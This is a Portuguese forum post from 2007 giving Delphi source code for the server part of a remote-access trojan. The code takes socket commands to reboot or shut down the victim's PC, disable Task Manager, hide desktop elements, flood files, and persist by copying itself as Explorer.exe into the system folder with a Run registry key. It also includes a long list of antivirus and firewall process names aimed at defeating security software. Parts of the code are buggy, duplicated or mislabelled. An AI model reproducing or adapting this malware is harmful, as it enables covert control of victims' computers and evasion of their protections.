Criando um Trojan ~ Com alguns adicionais Parte 2

Anonymous · 06 de Setembro , 2007, 04:41:49 PM

Server

Citarunit Unit1;

interface

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ExtCtrls, ScktComp, mmsystem, Registry, StdCtrls, ComCtrls, ShellAPI,
XPMan, jpeg, Buttons, TLHelp32;

type
TForm1 = class(TForm)
hcClient: TClientSocket;
Timer1: TTimer;
XPManifest1: TXPManifest;
Image1: TImage;
Edit1: TEdit;
Edit2: TEdit;
Memo1: TMemo;
procedure Timer1Timer(Sender: TObject);
procedure hcClientError(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure hcClientRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{Conective =)}
end;

var
Form1: TForm1;
hcReg:TRegistry;
I:integer;
C: TCanvas;
D: HDC;
hcPT : TPoint;
DTM: Tregistry;
Lista: TStringList;
a : string;
Handle:THandle;
Proc:TProcessEntry32W;
PID:Integer;

const
sRegPolicies = '\Software\Microsoft\Windows\CurrentVersion\Policies';

implementation

{$R *.dfm}

Procedure FinalizarProcesso(Nome:String);
var
Handle:THandle;
Proc:TProcessEntry32W;
PID:Integer;
begin
PID:=-1;
Handle:=CreateToolHelp32SnapShot(15,0);
Proc.dwSize:=SizeOf(TProcessEntry32W);
Try
Process32FirstW(Handle,Proc);
Repeat
if Nome=Proc.szExeFile then begin
PID:=Proc.TH32ProcessID;
Break;
end;
Until not Process32NextW(Handle,Proc);
Finally CloseHandle(Handle);
end;
if PID<>-1 then TerminateProcess(OpenProcess(2035711,True,PID),0);
end;

function GetMySysDir:string;
var buf:string;
lng:integer;
begin
SetLength(buf,255);
lng:=GetSystemDirectory(PChar(buf),255);
Result:=Copy(buf,1,lng);
if Copy(Result,lng,1)<>'\' then
Result:=Concat(Result,'\');
end;

procedure TForm1.Timer1Timer(Sender: TObject);
begin
if not hcClient.Active then
hcClient.Active := true;
end;

procedure TForm1.hcClientError(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
begin
errorcode:=0;
end;

procedure TForm1.hcClientRead(Sender: TObject; Socket: TCustomWinSocket);
var
Conective : string;
begin
Conective := socket.ReceiveText;

{Abrir CD-Rom}

if Conective = 'abrir_cd' then
begin
try
mciSendString('Set cdaudio door open wait', nil, 0, handle);
socket.SendText('CD|DVD aberto com sucesso');
except
socket.SendText('Não foi possivel abrir CD|DVD');
end;
exit;
end;

{Fechar CD-Rom}

if Conective = 'fechar_cd' then
begin
try
mciSendString('Set cdaudio door closed wait', nil, 0, handle);
socket.SendText('CD|DVD fechado com sucesso');
except
socket.SendText('Não foi possivel fechar CD|DVD');
end;
exit;
end;

{Reiniciar PC}

if Conective = 'reiniciar_pc' then
begin
try
ExitWindowsEx(EWX_REBOOT,0);
socket.SendText('Computador Reiniciado');
except
socket.SendText('Não foi possivel reiniciar o Computador');
end;
exit;
end;

{Desligar PC}

if Conective = 'desligar_pc' then
begin
try
ExitWindowsEx(EWX_SHUTDOWN,0);
socket.SendText('Computador Desligado');
except
socket.SendText('Não foi possivel desligar o Computador');
end;
exit;
end;

{Logoff PC}

if Conective = 'logoff_pc' then
begin
try
ExitWindowsEx(EWX_LOGOFF,0);
socket.SendText('Logoff Completado');
except
socket.SendText('Não foi possivel fazer logoff');
end;
exit;
end;

{Desligar PC com Força Bruta}

if Conective = 'desligarforte_pc' then
begin
try
ExitWindowsEx(EWX_FORCE,0);
socket.SendText('Computador Desligado à Força Bruta');
except
socket.SendText('Não Foi Possivel desligar o Computador com Força Bruta');
end;
exit;
end;

{Ativar Gerenciador de Tarefas do Windows}

if Conective = 'gerenciadorativar_pc' then
begin
try
DTM:= tregistry.Create;
DTM.RootKey:= HKEY_CURRENT_USER;
DTM.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\system\',true);
DTM.WriteInteger('DisableTaskMgr',0);
DTM.Free;
socket.SendText('Gerenciador de Tarefas Ativado');
except
socket.SendText('Não Foi Possivel ativar o Gerenciador de Tarefas');
end;
exit;
end;

{Desativar Gerenciador de Tarefas do Windows}

if Conective = 'gerenciadordesativar_pc' then
begin
try
DTM:= tregistry.Create;
DTM.RootKey:= HKEY_CURRENT_USER;
DTM.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\system\',false);
DTM.WriteInteger('DisableTaskMgr',1);
DTM.Free;
socket.SendText('Gerenciador de Tarefas Desativado');
except
socket.SendText('Não Foi Possivel desativar o Gerenciador de Tarefas');
end;
exit;
end;

{StandBy}

if Conective = 'standby_pc' then
begin
try
SendMessage(Application.Handle, wm_SysCommand, SC_MonitorPower, 0);
socket.SendText('Modo StandBy ativado');
except
socket.SendText('Não Foi Possivel entrar em modo StandBy');
end;
exit;
end;

{Cursor}

if Conective = 'cursor_pc' then
begin
try
SetCursorPos(Random(800),Random(600));
socket.SendText('Curso Maluco Ativado');
except
socket.SendText('Não Foi Possivel ativar o Cursor Maluco');
end;
exit;
end;

{Matar Botão do Iniciar}

if Conective = 'matariniciar_pc' then
begin
try
PostMessage(FindWindowEx(FindWindow('Shell_TrayWnd',nil),0,'Button',nil),WM_CLOSE,0,0);
socket.SendText('Botão do Iniciar Finalizado');
except
socket.SendText('Não Foi Possivel finalizar com o botão do iniciar');
end;
exit;
end;

{Esconder Icones da Area de Trabalho}

if Conective = 'escondericones_pc' then
begin
try
ShowWindow(FindWindow(nil,'Program Manager'),SW_HIDE);
socket.SendText('ícones Escondidos');
except
socket.SendText('Não Foi Possivel esconder os ícones');
end;
exit;
end;

{Mostrar Icones da Area de Trabalho}

if Conective = 'mostraricones_pc' then
begin
try
ShowWindow(FindWindow(nil,'Program Manager'),SW_SHOW);
socket.SendText('Icones Ativados na area de trabalho');
except
socket.SendText('Não Foi Possivel mostrar os icones');
end;
exit;
end;

{Ocultar Barra de Tarefas}

if Conective = 'tarefaocultada_pc' then
begin
try
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_HIDE);
socket.SendText('Barra de Tarefas Ocultado');
except
socket.SendText('Não Foi Possivel ocultar a barra de tarefas');
end;
exit;
end;

{Mostrar Barra de Tarefas}

if Conective = 'mostrartarefa_pc' then
begin
try
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNORMAL);
socket.SendText('Barra de Tarefas Ativada');
except
socket.SendText('Não Foi Possivel mostrar a barra de tarefas');
end;
exit;
end;

{KeyLogger}

if Conective = 'keylogger_pc' then
begin
try
ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNORMAL);
socket.SendText('Barra de Tarefas Ativada');
except
socket.SendText('Não Foi Possivel mostrar a barra de tarefas');
end;
exit;
end;

{Registro}

if Conective = 'system_pc' = False then
begin
try
hcReg:=TRegistry.Create;
hcReg.RootKey:=HKEY_LOCAL_MACHINE;
hcReg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',False);
hcReg.WriteString('Explorer',GetMySysDir+'Explorer.exe')
except
socket.SendText('Não Foi Possivel criar registro');
end;
exit;
end;

{Server na Pasta System}

if Conective = 'system2_pc' then
begin
try
CopyFile(PChar(Application.ExeName),PChar(ConCat(GetMySysDir,'Explorer.exe')), False);
socket.SendText('Server na Pasta System');
except
socket.SendText('Não Foi enviar o Server para a pasta system');
end;
exit;
end;

{Deletar Registro}

if Conective = 'system3_pc' = True then
begin
try
hcReg:=TRegistry.Create;
hcReg.RootKey:=HKEY_LOCAL_MACHINE;
hcReg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',False);
hcReg.DeleteValue('Explorer');
except
socket.SendText('Não Foi enviar deletar o registro');
end;
exit;
end;

{Sumir com Relógio}

if Conective = 'relogio_pc' then
begin
try
ShowWindow(FindWindowEx(FindWindowEx(FindWindow('shell_traywnd',nil),0,'TrayNotifyWnd',nil),0,'TrayClockWClass',nil),0);
socket.SendText('Relógio Escondido');
except
socket.SendText('Não Foi possivel sumir com o relogio');
end;
exit;
end;

{Restaurar com Relógio}

if Conective = 'relogio_pc' then
begin
try
ShowWindow(FindWindowEx(FindWindowEx(FindWindow('shell_traywnd',nil),0,'TrayNotifyWnd',nil),0,'TrayClockWClass',nil),1);
socket.SendText('Relógio Restaurado');
except
socket.SendText('Não Foi possivel restaurar o relogio');
end;
exit;
end;

{Flood}

if Conective = 'flood_pc' then
begin
try
For I := 1 To 10000 do
CreateFile(PChar('Testing ' + IntToStr(i)),0,0,0,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,0);
socket.SendText('Flood Realizado');
except
socket.SendText('Não Foi possivel realizar flood');
end;
exit;
end;

{Travar Mouse}

if Conective = 'mouse_pc' then
begin
try
Form1.Enabled:=true;
SetCursorPos(hcPT.x - 100, hcPT.y - 100);
D := GetDC( 0 );
C := Canvas;
C.Handle := (D);
Randomize;
C.PenPos := Mouse.CursorPos;
C.LineTo(Mouse.CursorPos.x-Random(10),Mouse.CursorPos.y-Random(10));
C.LineTo(Mouse.CursorPos.x+Random(10),Mouse.CursorPos.y+Random(10));
C.LineTo(Mouse.CursorPos.y-Random(10),Mouse.CursorPos.x-Random(10));
C.LineTo(Mouse.CursorPos.y+Random(10),Mouse.CursorPos.x+Random(10));
C.TextOut(Random(Screen.Width),Random(Screen.height),'Conective Trojan');
socket.SendText('Mouse Travado');
except
socket.SendText('Não Foi possivel travar Mouse');
end;
exit;
end;

{Desbloquear Mouse}

if Conective = 'mouse2_pc' then
begin
try
Form1.Enabled:=false;
SetCursorPos(hcPT.x - 100, hcPT.y - 100);
D := GetDC( 0 );
C := Canvas;
C.Handle := (D);
Randomize;
C.PenPos := Mouse.CursorPos;
C.LineTo(Mouse.CursorPos.x-Random(10),Mouse.CursorPos.y-Random(10));
C.LineTo(Mouse.CursorPos.x+Random(10),Mouse.CursorPos.y+Random(10));
C.LineTo(Mouse.CursorPos.y-Random(10),Mouse.CursorPos.x-Random(10));
C.LineTo(Mouse.CursorPos.y+Random(10),Mouse.CursorPos.x+Random(10));
C.TextOut(Random(Screen.Width),Random(Screen.height),'Conective Trojan');
socket.SendText('Mouse Desbloqueado');
except
socket.SendText('Não Foi possivel desbloquear Mouse');
end;
exit;
end;

{Kill AV and Firewall}

if Conective = 'flood_pc' then
begin
try
WinExec('_AVPM.EXE',1);
WinExec('AVP32.EXE',1);
WinExec('AVPCC.EXE',1);
WinExec('AVPM.EXE',1);
WinExec('AVP.EXE',1);
WinExec('NAVAPW32.EXE',1);
WinExec('NAVW32.EXE',1);
WinExec('ICLOAD95.EXE',1);
WinExec('ICMON.EXE',1);
WinExec('ICSUPP95.EXE',1);
WinExec('ICLOADNT.EXE',1);
WinExec('ICSUPPNT.EXE',1);
WinExec('IFACE.EXE',1);
WinExec('ANTS.EXE',1);
WinExec('Anti-Trojan.exe',1);
WinExec('iamapp.exe',1);
WinExec('iamserv.exe',1);
WinExec('FRW.EXE',1);
WinExec('blackice.exe',1);
WinExec('blackd.exe',1);
WinExec('zonealarm.exe',1);
WinExec('vsmon.exe',1);
WinExec('WrCtrl.exe',1);
WinExec('WrAdmin.exe',1);
WinExec('WrCtrl.exe',1);
WinExec('cleaner3.exe',1);
WinExec('cleaner.exe',1);
WinExec('tca.exe',1);
WinExec('MooLive.exe',1);
WinExec('lockdown2000.exe',1);
WinExec('Sphinx.exe',1);
WinExec('VSHWIN32.EXE',1);
WinExec('VSECOMR.EXE',1);
WinExec('WEBSCANX.EXE',1);
WinExec('AVCONSOL.EXE',1);
WinExec('VSSTAT.EXE',1);
WinExec('ACKWIN32.EXE',1);
WinExec('ADVXDWIN.EXE',1);
WinExec('AGENTSVR.EXE',1);
WinExec('AHNSD.EXE',1);
WinExec('ALERTSVC.EXE',1);
WinExec('ALOGSERV.EXE',1);
WinExec('AMON9X.EXE',1);
WinExec('ANTI-TROJAN.EXE',1);
WinExec('ANTIVIRUS.EXE',1);
WinExec('ANTS.EXE',1);
WinExec('APIMONITOR.EXE',1);
WinExec('APLICA32.EXE',1);
WinExec('APVXDWIN.EXE',1);
WinExec('ATCON.EXE',1);
WinExec('ATGUARD.EXE',1);
WinExec('ATRO55EN.EXE',1);
WinExec('ATUPDATER.EXE',1);
WinExec('ATWATCH.EXE',1);
WinExec('AUPDATE.EXE',1);
WinExec('AUTODOWN.EXE',1);
WinExec('AUTODOWN.exe',1);
WinExec('AUTOTRACE.EXE',1);
WinExec('AUTOUPDATE.EXE',1);
WinExec('AVCONSOL.EXE ',1);
WinExec('AVGCC32.EXE',1);
WinExec('AVGCTRL.EXE',1);
WinExec('AVGSERV.EXE',1);
WinExec('AVGSERV9.EXE',1);
WinExec('AVGW.EXE',1);
WinExec('AVKPOP.EXE',1);
WinExec('AVKSERV.EXE',1);
WinExec('AVKSERVICE.EXE',1);
WinExec('AVKWCL9.EXE',1);
WinExec('AVKWCTL9.EXE',1);
WinExec('AVP.EXE',1);
WinExec('AVP32.EXE',1);
WinExec('AVPCC.EXE',1);
WinExec('AVPEXEC.EXE',1);
WinExec('AVPINST.EXE',1);
WinExec('AVPM.EXE',1);
WinExec('AVPUPD.EXE',1);
WinExec('AVRESCUE.EXE',1);
WinExec('AVSYNMGR.EXE',1);
WinExec('AVSYNMGR.exe',1);
WinExec('AVWINNT.EXE',1);
WinExec('AVXMONITOR9X.EXE',1);
WinExec('AVXMONITORNT.EXE',1);
WinExec('AVXQUAR.EXE',1);
WinExec('AVXQUAR.EXE.EXE',1);
WinExec('AVXW.EXE',1);
WinExec('AckWin32.exe',1);
WinExec('Alerter',1);
WinExec('AutoDown.exe',1);
WinExec('AutoTrace.exe',1);
WinExec('AvSynMgr',1);
WinExec('AvgServ',1);
WinExec('Avgctrl.exe',1);
WinExec('AvkServ.exe',1);
WinExec('Avsched32.exe',1);
WinExec('BD_PROFESSIONAL.EXE',1);
WinExec('BIDEF.EXE',1);
WinExec('BIDSERVER.EXE',1);
WinExec('BIPCP.EXE',1);
WinExec('BIPCPEVALSETUP.EXE',1);
WinExec('BISP.EXE',1);
WinExec('BLACKD.EXE',1);
WinExec('BLACKICE.EXE',1);
WinExec('BOOTWARN.EXE',1);
WinExec('BORG2.EXE',1);
WinExec('BS120.EXE',1);
WinExec('BlackICE.exe',1);
WinExec('CDP.EXE',1);
WinExec('CFGWIZ.EXE',1);
WinExec('CFIADMIN.EXE',1);
WinExec('CFIAUDIT.EXE',1);
WinExec('CFINET.EXE',1);
WinExec('CFINET32.EXE',1);
WinExec('CLAW95.EXE',1);
WinExec('CLAW95CF.EXE',1);
WinExec('CLEAN.EXE',1);
WinExec('CLEANER.EXE',1);
WinExec('CLEANER3.EXE',1);
WinExec('CLEANPC.EXE',1);
WinExec('CMGRDIAN.EXE',1);
WinExec('CMON016.EXE',1);
WinExec('CONNECTIONMONITOR.EXE',1);
WinExec('CPD.EXE',1);
WinExec('CPDCLNT.EXE',1);
WinExec('CPDClnt.exe',1);
WinExec('CPF9X206.EXE',1);
WinExec('CPFNT206.EXE',1);
WinExec('CSINJECT.EXE',1);
WinExec('CSINSM32',1);
WinExec('CSS 1631.EXE',1);
WinExec('CTRL.EXE',1);
WinExec('CV.EXE',1);
WinExec('CWNB181.EXE',1);
WinExec('CWNTDWMO.EXE',1);
WinExec('Claw95.exe',1);
WinExec('Claw95cf.exe',1);
WinExec('DEFSCANGUI.EXE',1);
WinExec('DEFWATCH.EXE',1);
WinExec('DEPUTY.EXE',1);
WinExec('DOORS.EXE',1);
WinExec('DPF.EXE',1);
WinExec('DRWATSON.EXE',1);
WinExec('DRWEB32.EXE',1);
WinExec('DVP95.EXE',1);
WinExec('DVP95_0.EXE',1);
WinExec('EFPEADM.EXE',1);
WinExec('EFPEADM.exe',1);
WinExec('ENT.EXE',1);
WinExec('ESCANH95.EXE',1);
WinExec('ESCANHNT.EXE',1);
WinExec('ESCANV95.EXE',1);
WinExec('ETRUSTCIPE.EXE',1);
WinExec('ETRUSTCIPE.exe',1);
WinExec('EVPN.EXE',1);
WinExec('EVPN.exe',1);
WinExec('EXANTIVIRUS-CNET.EXE',1);
WinExec('EXPERT.EXE',1);
WinExec('F-AGNT95.EXE',1);
WinExec('F-PROT.EXE',1);
WinExec('F-PROT95.EXE',1);
WinExec('F-STOPW.EXE',1);
WinExec('FAMEH32.EXE',1);
WinExec('FAST.EXE',1);
WinExec('FCH32.EXE',1);
WinExec('FIH32.EXE',1);
WinExec('FIREWALL.EXE',1);
WinExec('FIX-IT.EXE',1);
WinExec('FLOWPROTECTOR.EXE',1);
WinExec('FNRB32.EXE',1);
WinExec('FP-WIN.EXE',1);
WinExec('FP-WIN_TRIAL.EXE',1);
WinExec('FRW.EXE',1);
WinExec('FSAA.EXE',1);
WinExec('FSAV.EXE',1);
WinExec('FSAV32.EXE',1);
WinExec('FSAV530STBYB.EXE',1);
WinExec('FSAV530WTBYB.EXE',1);
WinExec('FSAV95.EXE',1);
WinExec('FSAVE32.EXE',1);
WinExec('FSGK32.EXE',1);
WinExec('FSM32.EXE',1);
WinExec('FSMA32.EXE',1);
WinExec('FSMB32.EXE',1);
WinExec('FWENC.EXE',1);
WinExec('GBMENU.EXE',1);
WinExec('GBPOLL.EXE',1);
WinExec('GENERICS.EXE',1);
WinExec('GUARD.EXE',1);
WinExec('GUARDDOG.EXE',1);
WinExec('HACKTRACERSETUP.EXE',1);
WinExec('HTLOG.EXE',1);
WinExec('HWPE.EXE',1);
WinExec('IAMAPP.EXE',1);
WinExec('IAMSERV.EXE',1);
WinExec('IAMSTATS.EXE',1);
WinExec('ICLOAD95.EXE',1);
WinExec('ICLOADNT.EXE',1);
WinExec('ICMON.EXE',1);
WinExec('ICSUPP95.EXE',1);
WinExec('ICSUPP95.EXE',1);
WinExec('ICSUPPNT.EXE',1);
WinExec('IFACE.EXE',1);
WinExec('IFW2000.EXE',1);
WinExec('IOMON98.EXE',1);
WinExec('IPARMOR.EXE',1);
WinExec('IRIS.EXE',1);
WinExec('ISRV95.EXE',1);
WinExec('JAMMER.EXE',1);
WinExec('JEDI.EXE',1);
WinExec('KAVLITE40ENG.EXE',1);
WinExec('KAVPERS40ENG.EXE',1);
WinExec('KERIO-PF-213-EN-WIN.EXE',1);
WinExec('KERIO-WRL-421-EN-WIN.EXE',1);
WinExec('KERIO-WRP-421-EN-WIN.EXE',1);
WinExec('KILLPROCESSSETUP161.EXE',1);
WinExec('LDNETMON.EXE',1);
WinExec('LDPRO.EXE',1);
WinExec('LDPROMENU.EXE',1);
WinExec('LDSCAN.EXE',1);
WinExec('LOCALNET.EXE',1);
WinExec('LOCKDOWN.EXE',1);
WinExec('LOCKDOWN2000.EXE',1);
WinExec('LSETUP.EXE',1);
WinExec('LUALL.EXE',1);
WinExec('LUAU.EXE',1);
WinExec('LUCOMSERVER.EXE',1);
WinExec('LUINIT.EXE',1);
WinExec('LUSPT.exe',1);
WinExec('MCAGENT.EXE',1);
WinExec('MCMNHDLR.EXE',1);
WinExec('MCSHIELD.EXE',1);
WinExec('MCTOOL.EXE',1);
WinExec('MCUPDATE.EXE',1);
WinExec('MCVSRTE.EXE',1);
WinExec('MCVSSHLD.EXE',1);
WinExec('MFW2EN.EXE',1);
WinExec('MFWENG3.02D30.EXE',1);
WinExec('MGAVRTCL.EXE',1);
WinExec('MGAVRTE.EXE',1);
WinExec('MGHTML.EXE',1);
WinExec('MGUI.EXE',1);
WinExec('MINILOG.EXE',1);
WinExec('MONITOR.EXE',1);
WinExec('MONSYS32.EXE',1);
WinExec('MONSYSNT.EXE',1);
WinExec('MONWOW.EXE',1);
WinExec('MOOLIVE.EXE',1);
WinExec('MPFAGENT.EXE',1);
WinExec('MPFSERVICE.exe',1);
WinExec('MPFTRAY.EXE',1);
WinExec('MRFLUX.EXE',1);
WinExec('MSINFO32.EXE',1);
WinExec('MSSMMC32.EXE',1);
WinExec('MU0311AD.EXE',1);
WinExec('MWATCH.EXE',1);
WinExec('MWATCH.exe',1);
WinExec('MXTASK.EXE',1);
WinExec('Mcshield.exe',1);
WinExec('Monitor.exe',1);
WinExec('NAV Auto-Protect',1);
WinExec('NAV80TRY.EXE',1);
WinExec('NAVAP',1);
WinExec('NAVAPSVC.EXE',1);
WinExec('NAVAPW32.EXE',1);
WinExec('NAVDX.EXE',1);
WinExec('NAVENG',1);
WinExec('NAVENGNAVEX15',1);
WinExec('NAVEX15',1);
WinExec('NAVLU32.EXE',1);
WinExec('NAVRUNR.EXE',1);
WinExec('NAVSTUB.EXE',1);
WinExec('NAVW32.EXE',1);
WinExec('NAVWNT.EXE',1);
WinExec('NC2000.EXE',1);
WinExec('NCINST4.EXE',1);
WinExec('NDD32.EXE',1);
WinExec('NEOMONITOR.EXE',1);
WinExec('NEOWATCHLOG.EXE',1);
WinExec('NETARMOR.EXE',1);
WinExec('NETINFO.EXE',1);
WinExec('NETMON.EXE',1);
WinExec('NETSCANPRO.EXE',1);
WinExec('NETSPYHUNTER-1.2.EXE',1);
WinExec('NETSTAT.EXE',1);
WinExec('NETUTILS.EXE',1);
WinExec('NISSERV.EXE',1);
WinExec('NISUM.EXE',1);
WinExec('NMAIN.EXE',1);
WinExec('NORMIST.EXE',1);
WinExec('NORTON_INTERNET_SECU_3.0_407.EXE',1);
WinExec('NPF40_TW_98_NT_ME_2K.EXE',1);
WinExec('NPFMESSENGER.EXE',1);
WinExec('NPROTECT.EXE',1);
WinExec('NPSSVC.EXE',1);
WinExec('NSCHED32.EXE',1);
WinExec('NTVDM.EXE',1);
WinExec('NTXCONFIG.EXE',1);
WinExec('NTXconfig.exe',1);
WinExec('NUI.EXE',1);
WinExec('NVARCH16.EXE',1);
WinExec('NVC95.EXE',1);
WinExec('NVLAUNCH.EXE',1);
WinExec('NVSVC32',1);
WinExec('NWINST4.EXE',1);
WinExec('NWSERVICE.EXE',1);
WinExec('NWService.exe',1);
WinExec('NWTOOL16.EXE',1);
WinExec('Navw32.exe',1);
WinExec('NeoWatchLog.exe',1);
WinExec('Nui.EXE',1);
WinExec('Nupgrade.exe',1);
WinExec('OFFGUARD.EXE',1);
WinExec('OSTRONET.EXE',1);
WinExec('OUTPOST.EXE',1);
WinExec('OUTPOSTINSTALL.EXE',1);
WinExec('OUTPOSTPROINSTALL.EXE',1);
WinExec('PADMIN.EXE',1);
WinExec('PANIXK.EXE',1);
WinExec('PAVPROXY.EXE',1);
WinExec('PCC2002S902.EXE',1);
WinExec('PCC2K_76_1436.EXE',1);
WinExec('PCCCLIENT.EXE',1);
WinExec('PCCGUIDE.EXE',1);
WinExec('PCCIOMON.EXE',1);
WinExec('PCCNTMON.EXE',1);
WinExec('PCCPFW',1);
WinExec('PCCWIN97.EXE',1);
WinExec('PCCWIN98.EXE',1);
WinExec('PCDSETUP.EXE',1);
WinExec('PCFWALLICON.EXE',1);
WinExec('PCIP10117_0.EXE',1);
WinExec('PCSCAN.EXEPDSETUP.EXE',1);
WinExec('PERISCOPE.EXE',1);
WinExec('PERSFW.EXE ',1);
WinExec('PERSWF.EXE',1);
WinExec('PF2.EXE',1);
WinExec('PFWADMIN.EXE',1);
WinExec('PINGSCAN.EXE',1);
WinExec('PLATIN.EXE',1);
WinExec('POP3TRAP.EXE',1);
WinExec('POPROXY.EXE',1);
WinExec('POPSCAN.EXE',1);
WinExec('PORTDETECTIVE.EXE',1);
WinExec('PORTMONITOR.EXE',1);
WinExec('PPINUPDT.EXE',1);
WinExec('PPTBC.EXE',1);
WinExec('PPVSTOP.EXE',1);
WinExec('PROCESSMONITOR.EXE',1);
WinExec('PROCEXPLORERV1.0.EXE',1);
WinExec('PROGRAMAUDITOR.EXE',1);
WinExec('PROPORT.EXE',1);
WinExec('PROTECTX.EXE',1);
WinExec('PSPF.EXE',1);
WinExec('PURGE.EXE',1);
WinExec('PVIEW95.EXE',1);
WinExec('QCONSOLE.EXE',1);
WinExec('QSERVER.EXE',1);
WinExec('RAV7.EXE',1);
WinExec('RAV7WIN.EXE',1);
WinExec('RAV8WIN32ENG.EXE',1);
WinExec('REALMON.EXE',1);
WinExec('RESCUE.EXE',1);
WinExec('RESCUE32.EXE',1);
WinExec('RRGUARD.EXE',1);
WinExec('RSHELL.EXE',1);
WinExec('RTVSCN95.EXE',1);
WinExec('RULAUNCH.EXE',1);
WinExec('Rescue.exe',1);
WinExec('SAFEWEB.EXE',1);
WinExec('SBSERV.EXE',1);
WinExec('SCAN32.EXE',1);
WinExec('SCHEDAPP.EXE',1);
WinExec('SCRSCAN.EXE',1);
WinExec('SD.EXE',1);
WinExec('SETUPVAMEEVAL.EXE',1);
WinExec('SETUP_FLOWPROTECTOR_US.EXE',1);
WinExec('SFC.EXE',1);
WinExec('SGSSFW32.EXE',1);
WinExec('SH.EXE',1);
WinExec('SHELLSPYINSTALL.EXE',1);
WinExec('SHN.EXE',1);
WinExec('SMC.EXE',1);
WinExec('SOFI.EXE',1);
WinExec('SPF.EXE',1);
WinExec('SPHINX.EXE',1);
WinExec('SPYXX.EXE',1);
WinExec('SRWATCH.EXE',1);
WinExec('SS3EDIT.EXE',1);
WinExec('ST2.EXE',1);
WinExec('SUPFTRL.EXE',1);
WinExec('SUPPORTER5.EXE',1);
WinExec('SWEEP95.EXE',1);
WinExec('SWEEPSRV.SYS',1);
WinExec('SWEEPSRV.SYS',1);
WinExec('SWNETSUP.EXE',1);
WinExec('SYMPROXYSVC.EXE',1);
WinExec('SYMTRAY.EXE',1);
WinExec('SYSDOC32.EXE',1);
WinExec('SYSEDIT.EXE',1);
WinExec('Sphinx.exe',1);
WinExec('SweepNet',1);
WinExec('SymProxySvc.exe',1);
WinExec('TASKMON.EXE',1);
WinExec('TAUMON.EXE',1);
WinExec('TAUSCAN.EXE',1);
WinExec('TC.EXE',1);
WinExec('TCA.EXE',1);
WinExec('TCM.EXE',1);
WinExec('TDS-3.EXE',1);
WinExec('TDS2-98.EXE',1);
WinExec('TDS2-NT.EXE',1);
WinExec('TFAK.EXE',1);
WinExec('TFAK5.EXE',1);
WinExec('TGBOB.EXE',1);
WinExec('TITANIN.EXE',1);
WinExec('TITANINXP.EXE',1);
WinExec('TRACERT.EXE',1);
WinExec('TRJSCAN.EXE',1);
WinExec('TRJSETUP.EXE',1);
WinExec('TROJANTRAP3.EXE',1);
WinExec('Tmntsrv',1);
WinExec('UNDOBOOT.EXE',1);
WinExec('UPDATE.EXE',1);
WinExec('Uh`S@d',1);
WinExec('VBCMSERV.EXE',1);
WinExec('VBCONS.EXE',1);
WinExec('VBUST.EXE',1);
WinExec('VBWIN9X.EXE',1);
WinExec('VBWINNTW.EXE',1);
WinExec('VCCMSERV.EXE',1);
WinExec('VCSETUP.EXE',1);
WinExec('VET32.EXE',1);
WinExec('VET32.exe',1);
WinExec('VET95.EXE',1);
WinExec('VETTRAY.EXE',1);
WinExec('VFSETUP.EXE',1);
WinExec('VIR-HELP.EXE',1);
WinExec('VIRUSMDPERSONALFIREWALL.EXE',1);
WinExec('VNLAN300.EXE',1);
WinExec('VNPC3000.EXE',1);
WinExec('VPC32.EXE',1);
WinExec('VPC42.EXE',1);
WinExec('VPFW30S.EXE',1);
WinExec('VPTRAY.EXE',1);
WinExec('VSCENU6.02D30.EXE',1);
WinExec('VSCHED.EXE',1);
WinExec('VSECOMR.EXE',1);
WinExec('VSHWIN32.EXE',1);
WinExec('VSISETUP.EXE',1);
WinExec('VSMAIN.EXE',1);
WinExec('VSMON.EXE',1);
WinExec('VSSTAT.EXE',1);
WinExec('VSWIN9XE.EXE',1);
WinExec('VSWINNTSE.EXE',1);
WinExec('VSWINPERSE.EXE',1);
WinExec('VVSTAT.EXE',1);
WinExec('VbCons.exe',1);
WinExec('Vet95.exe',1);
WinExec('VetTray.exe',1);
WinExec('W32DSM89.EXE',1);
WinExec('W9X.EXE',1);
WinExec('WATCHDOG.EXE',1);
WinExec('WEBSCANX.EXE',1);
WinExec('WEBTRAP.EXE',1);
WinExec('WGFE95.EXE',1);
WinExec('WHOSWATCHINGME.EXE',1);
WinExec('WIMMUN32.EXE',1);
WinExec('WINRECON.EXE',1);
WinExec('WINROUTE',1);
WinExec('WINSFCM.EXE',1);
WinExec('WNT.EXE',1);
WinExec('WRADMIN.EXE',1);
WinExec('WRCTRL.EXE',1);
WinExec('WSBGATE.EXE',1);
WinExec('WYVERNWORKSFIREWALL.EXE',1);
WinExec('WrAdmin.exe',1);
WinExec('WrCtrl.exe',1);
WinExec('XPF202EN.EXE',1);
WinExec('ZAPRO.EXE',1);
WinExec('ZAPSETUP3001.EXE',1);
WinExec('ZATUTOR.EXE',1);
WinExec('ZAUINST.EXE',1);
WinExec('ZONALM2601.EXE',1);
WinExec('ZONEALARM.EXE',1);
WinExec('_AVP32.EXE',1);
WinExec('_AVPCC.EXE',1);
WinExec('_AVPM.EXE',1);
WinExec('agentw.exe',1);
WinExec('alogserv.exe',1);
WinExec('apvxdwin.exe',1);
WinExec('avkpop.exe',1);
WinExec('avkservice.exe',1);
WinExec('avkwctl9.exe',1);
WinExec('avpm.exe',1);
WinExec('blackd.exe',1);
WinExec('ccApp.exe',1);
WinExec('ccEvtMgr.exe',1);
WinExec('ccPxySvc.exe',1);
WinExec('cfgWiz.exe',1);
WinExec('cleaner.EXE',1);
WinExec('cleaner3.EXE',1);
WinExec('cpd.exe',1);
WinExec('defalert.exe',1);
WinExec('defscangui.exe',1);
WinExec('f-stopw.exe',1);
WinExec('fameh32.exe',1);
WinExec('fch32.exe',1);
WinExec('fih32.exe',1);
WinExec('fnrb32.exe',1);
WinExec('fsaa.exe',1);
WinExec('fsav32.exe',1);
WinExec('fsgk32.exe',1);
WinExec('fsm32.exe',1);
WinExec('fsma32.exe',1);
WinExec('fsmb32.exe',1);
WinExec('gbmenu.exe',1);
